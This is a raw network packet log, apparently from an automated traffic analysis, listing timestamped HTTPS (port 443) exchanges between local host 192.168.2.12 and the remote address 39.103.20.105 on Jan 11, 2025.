                                    Jan 11, 2025 04:37:52.277956009 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.278670073 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.278713942 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.278805971 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.278850079 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.278924942 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.278965950 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.279655933 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.279700994 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.279808044 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.279849052 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.280554056 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.280602932 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.280639887 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.280674934 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.280807972 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.280858994 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.281573057 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.281614065 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.281636953 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.281672955 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.509500980 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.509547949 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.509618998 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.509649992 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.509669065 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.509681940 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.509740114 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.509783030 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.509965897 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.510006905 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.510102987 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.510143042 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.510286093 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.510328054 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.510605097 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.510643005 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.510652065 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.510674953 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.510683060 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.510709047 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.511432886 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.511449099 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.544724941 CET49721443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.544779062 CET4434972139.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.544862032 CET49721443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.545070887 CET49721443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.545080900 CET4434972139.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:53.907710075 CET4434972139.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:53.907849073 CET49721443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:53.908381939 CET49721443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:53.908391953 CET4434972139.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:53.908590078 CET49721443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:53.908593893 CET4434972139.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:54.234685898 CET4434972139.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:54.234719038 CET4434972139.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:54.234934092 CET49721443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:54.234960079 CET4434972139.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:54.234992981 CET4434972139.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:54.235003948 CET49721443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:54.235008955 CET4434972139.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:54.235040903 CET49721443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:54.236655951 CET4434972139.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:54.236726999 CET49721443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:54.236855030 CET49721443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:54.236881971 CET4434972139.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:54.236927032 CET49721443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:54.257338047 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:54.257400036 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:54.257479906 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:54.257693052 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:54.257704020 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.526231050 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.526374102 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:55.528955936 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.529061079 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:55.530354977 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:55.530375957 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.531193018 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.531254053 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:55.531591892 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:55.575331926 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.907267094 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.907296896 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.907418966 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:55.907434940 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.907449961 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.907484055 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:55.911037922 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.911113024 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:55.913006067 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.913063049 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:55.997864962 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.997939110 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.997956991 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.997994900 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:55.998008966 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.998054981 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:55.998819113 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.998868942 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:55.999799013 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:55.999850035 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.000194073 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.000245094 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.001769066 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.001830101 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.002001047 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.002052069 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.003611088 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.003662109 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.005543947 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.005608082 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.088320971 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.088427067 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.088531971 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.088594913 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.088608980 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.088648081 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.088665962 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.088989019 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.089018106 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.089037895 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.089044094 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.089070082 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.089085102 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.089615107 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.089667082 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.090415001 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.090470076 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.090673923 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.090696096 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.090718985 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.090728045 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.090754986 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.090775967 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.091115952 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.091166019 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.092250109 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.092299938 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.092761040 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.092809916 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.094160080 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.094208956 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.094250917 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.094299078 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.096317053 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.096363068 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.179207087 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.179250956 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.179281950 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.179297924 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.179336071 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.179363966 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.179374933 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.179383039 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.179425955 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.179430962 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.179466963 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.179599047 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.179625988 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.179646015 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.179651022 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.179672956 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.179691076 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.179881096 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.179934025 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.180078983 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.180126905 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.180238008 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.180289984 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.180299997 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.180354118 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.180699110 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.180747986 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.180802107 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.180845976 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.181056976 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.181106091 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.184087038 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.184129000 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.184154034 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.184155941 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.184170961 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.184191942 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.184211969 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.184262037 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.184310913 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.184360027 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.184405088 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.184992075 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.185044050 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.186666012 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.186714888 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.188446045 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.188491106 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.188498974 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.188510895 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.188541889 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.190423012 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.190471888 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.192365885 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.192414999 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.194367886 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.194412947 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.194416046 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.194427013 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.194453001 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.194474936 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.196317911 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.196362972 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.198273897 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.198317051 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.198333979 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.198343039 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.198370934 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.198390007 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.200577021 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.200627089 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.269686937 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.269735098 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.269750118 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.269759893 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.269773006 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.269784927 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.269799948 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.269803047 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.269818068 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.269828081 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.269843102 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.269865036 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.269910097 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.269947052 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.270011902 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.270051956 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.270267010 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.270308971 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.270411015 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.270450115 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.270457029 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.270463943 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.270497084 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.270735025 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.270775080 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.270776987 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.270792961 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.270816088 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.270828962 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.270869017 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.271110058 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.271143913 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.271238089 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.271261930 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.271279097 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.271284103 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.271302938 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.271318913 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.271734953 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.271804094 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.271929979 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.271971941 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.272042036 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.272085905 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.379909992 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.379968882 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.380688906 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.380724907 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.380740881 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.380750895 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.380772114 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.380789995 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.381654024 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.381701946 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.381839991 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.381880999 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.382600069 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.382642031 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.384512901 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.384562016 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.384563923 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.384577036 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.384598017 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.384615898 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.389255047 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.389306068 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.391343117 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.391400099 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.393192053 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.393225908 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.393238068 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.393249035 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.393274069 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.393289089 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.395143986 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.395190954 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.397173882 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.397222042 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.397258997 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.397308111 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.398958921 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.399045944 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.401087999 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.401135921 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.402856112 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.402900934 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.402909994 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.402921915 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.402960062 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.402960062 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.404825926 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.404865980 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.406820059 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.406867027 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.408596039 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.408649921 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.410542965 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.410588026 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.412916899 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.412983894 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.413039923 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.413081884 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.413160086 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.413211107 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.414484024 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.414522886 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.414541960 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.415384054 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.415430069 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.415468931 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.415512085 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.415621996 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.415663958 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.416459084 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.416508913 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.419899940 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.419949055 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.419967890 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.420017004 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.470927954 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.470999956 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.471044064 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.471108913 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.472495079 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.472553015 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.472572088 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.472615957 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.473294973 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.473352909 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.473407030 CET4434972239.103.20.105192.168.2.12
